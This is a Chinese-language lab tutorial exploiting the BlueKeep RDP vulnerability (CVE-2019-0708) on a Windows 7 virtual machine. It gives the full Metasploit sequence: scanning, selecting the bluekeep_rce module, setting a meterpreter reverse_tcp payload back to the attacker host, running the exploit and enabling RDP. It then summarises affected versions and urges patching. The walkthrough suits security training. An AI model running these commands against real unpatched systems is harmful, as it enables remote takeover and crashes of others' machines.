目录
一、环境准备
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。
说明:
这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机
1.开启Kali虚拟机和win7靶机
2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:
3.若3389没打开,可以右键计算机,选择属性
4.选择远程设置
5.选择允许远程连接
二、利用win 7 cve-2019-0708漏洞
本次漏洞利用使用kali自带的nmap扫描工具和metasploit渗透工具。
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
nmap是用来探测计算机网络上的主机和服务的一种安全扫描器。为了绘制网络拓扑图,Nmap的发送特制的数据包到目标主机,然后对返回数据包进行分析。Nmap是一款枚举和测试网络的强大工具。
1.在kali中使用nmap扫描目标机器端口确认是否开启3389端口:
nmap -sV 192.168.100.106
2.确认开启后启动msfconsole
msfconsole
3. 搜索漏洞:
search 0708
前两个模块,一个是扫描功能,一个是攻击功能。
4.使用攻击功能,也就是第二个模块:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
5.设置目标:
set rhost 192.168.100.106 #设置win7ip
set rport 3389
6.设置payload:
set payload windows/x64/meterpreter/reverse_tcp #设置64位的payload如果是32位机器则不用加x64
7.设置攻击机:
set lhost 攻击者ip #设置kali的ip
set lport 4444 #设置攻击者的监听端口(端口可以随意更改)
8.输入:show targets,显示可以选择的靶机的架构
9.用于vm是15.5.1,所以可以选择target 3-5
10.选择target 3,进行尝试:
set target 3
11.进行攻击,运行:run
这时我们发现win7已经蓝屏了
我们可以尝试其他target
我这里尝试了很多次都没能成功建立连接
12.假如可以建立连接,输入:
run post/windows/manage/enable_rdp
运行远程桌面模块
13.另开一个kali终端,输入:
rdesktop 192.168.100.103
如果漏洞利用成功的话是不需要用户名和密码就可以直接进入win7
三、总结
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,堪比WannaCry。它影响了某些旧版本的Windows系统,包括:
- Windows 7 for 32-bit Systems Service Pack 1
- Windows 7 for x64-based Systems Service Pack 1
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows XP SP3 x86
- Windows XP Professional x64 Edition SP2
- Windows XP Embedded SP3 x86
- Windows Server 2003 SP2 x86
- Windows Server 2003 x64 Edition SP2
- Windows 8和Windows 10及之后版本的用户不受此漏洞影响
2019年09月07日,黑客大佬Rapid7在Github公开发布了CVE-2019-0708(Windows远程桌面服务漏洞)的EXP,基于该模块的漏洞利用工具开始扩散,已经构成了蠕虫级的攻击威胁。
据360Center分析,该漏洞是预身份验证且无需用户交互,这意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。
CVE-2019-0708已公开的漏洞利用工具可以极易的被普通攻击者使用,脚本化/批量化/自动化攻击将接踵而至。经研判,360CERT确认漏洞等级严重,影响面广,建议相关单位、企业内部立即进行安全排查,给在漏洞影响范围内的服务器、主机及时更新安全补丁。